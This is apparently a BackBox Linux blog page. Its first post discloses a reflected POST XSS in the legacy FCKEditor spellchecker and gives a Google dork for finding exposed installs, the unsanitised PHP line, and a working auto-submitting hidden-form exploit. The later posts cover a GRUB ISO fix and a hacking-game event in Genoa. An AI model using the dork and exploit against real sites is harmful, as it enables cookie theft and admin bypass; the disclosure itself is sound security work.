FCKEditor reflected XSS vulnerability

Emilio Pinna has recently found a reflected POST XSS on a popular web WYSIWYG editor called FCKEditor. In 2009 has been rewrited and fixed with new name CKEditor, but old version is still popular as stand-alone application as WordPress/Joomla/Drupal extensions and embedded as editor in of web applications.

The bugged software was spreaded for more than six years and actually Google counts still more than 1,5 billion of results. A plausbile Google dork filtering out PHP sources could be:

inurl:fck_spellerpages/spellerpages/server-scripts/ -”The following variables”

The vulnerability

The reflected XSS is injected through ‘textinputs’ POST parameter array, printed without sanization in line 27:

echo "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";

As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session that visit resulting in a cookie stealing and bypass of admin access controls. Exploit is CRSF-like due to POST vulnerable parameter. Form exploit:

<html>
<body>
<iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe>
  <form method="post" name="sender"
   action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/
spellchecker.php" target="hidden">
   <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");
</script><!--' />
  </form>
</body>
<script>document.sender.submit(); </script>
</html>

Have fun!

GRUB error being fixed on BackBox 64 bit version

After release of BackBox 2.05 we have noticed that the GRUB being corrupted on ISO image of 64 bit version. We would like to inform everyone that the error has been fixed and the new ISO image being uplodaed on our official mirrors. In order to avoid any sort of problem, we would like to invite all users, to download the new ISO image. We would like to also thanks to the community of BackBox users for notification of this error.

Enjoy your BackBox!

12 May, BackBox Linux @ CAT2012

Anche questo anno il team di BackBox Linux scende in campo a sostegno di una delle iniziative piu interessanti nel panorama hacker italiano. Il CAT (Cracca Al Tesoro) è un “Hacking Game” il cui scopo è violare vari sistemi configurati per l’occasione, la squadra che otterrà il punteggio più alto verrà proclamata vincitrice.

Il nostro team, in accordo con gli organizzatori dell’evento, ha deciso di sostenere questa iniziativa il cui fine è sensibilizzare gli utenti su tematiche relative la sicurezza informatica e la protezione dei dati personali. Per l’occasione i partecipanti equipaggiati con BackBox, collegandosi al nostro canale IRC ufficiale avranno a disposizione il supporto dell’intera community

Il Cracca Al Tesoro 2012 si svolgerà presso la Fiera di Genova il 12 maggio, le iscrizioni sono gratuite, per maggiori informazioni wardriving.it